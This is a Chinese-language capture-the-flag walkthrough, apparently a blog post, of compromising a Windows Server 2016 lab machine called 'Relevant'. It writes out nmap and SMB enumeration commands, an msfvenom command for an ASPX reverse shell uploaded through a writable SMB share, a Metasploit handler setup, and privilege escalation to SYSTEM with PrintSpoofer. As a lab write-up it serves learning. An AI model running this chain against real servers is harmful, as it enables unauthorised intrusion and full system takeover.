Relevant
利用 smb 共享进行上传木马文件,反弹 shell,通过令牌伪造进行权限提升
再拿到目标 IP 之后一般都是使用 nmap 对于目标进行扫描来查看开放的端口情况
使用 sudo nmap -sS -Pn -v -T4 -p- [ip_address]对于目标先进行一次快速扫描,可以发现 80 端口是 web 服务,139,445 端口是 smb 共享服务
sudo nmap -A -sV -sC -T4 -p- --defeat-rst-ratelimit [ip_address]这条的扫描结果更为详细,不过时间要久一些,这里可以发现 49663 端口也是一个 web 服务,同时我们还发现了使用的服务器是 windows server 2016,是 x64 架构的,这会有利于后面工具的使用
先进入 80 端口查看一下
进入之后发现没有什么可以利用的地方,点击之后也都会跳转到 windows 的页面,所以使用 dirsearch对于目录进行爆破,看看有没有其他的路径
都是一些 400 和 403 ,很显然没有什么可以利用的地方,这时候就应该转向其他端口,寻找入口点
这里我准备先对 smb 的 445 端口进行查看,使用 smbmap 看看端口下都有什么共享
找到了一个 nt4wrksv 文件夹,我们对其拥有读和写的权限,使用 smbclient来尝试连接,然后发现了一个 passwords 的文件,使用 get passwords.txt进行下载
下载之后打开发现里面是两行 base64 编码的数据
然后尝试能不能使用 rdp 进行连接,不过都没能连接上去
那么我就开始选择使用木马进行反弹 shell,因为 445 端口的 smb 服务中有一个文件夹我们拥有写入的权限
我们先使用 msfvenom 来生成一个木马 msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ip_address] LPORT=[port] -a x64 --platform Windows -f aspx -o tr3ad1n.aspx
然后使用 smbclient连接 smb 服务,使用 put ./tr3ad1n.aspx tr3ad1n.aspx把木马上传到文件夹中去
我们先使用 metasploit 来监听一个端口,这里也可以直接使用 nc来监听 8888 来接收后面的 shell
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
set LPORT 8888
run
然后我们访问 10.10.103.28:49663/nt4wrksv/passwords.txt发现可以访问到文件夹,也可以读取到文件,那我们直接访问我们上传的木马就可以拿到 shell 了(注:80 端口也尝试过,但是无法访问,从而尝试了 49663 端口)
获得立足点之后,使用 whoami /priv来显示当前用户的所有权限和状态,我们发现 SeImpersonatePrivilege 权限,这可以实现使用其他的权限来执行命令
我们这里利用 PrintSpoofer 这个工具来进行权限的提升
使用 printspoof.exe -i -c cmd然后就可以直接拿到 system 权限
然后就可以拿到用户和根 Flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
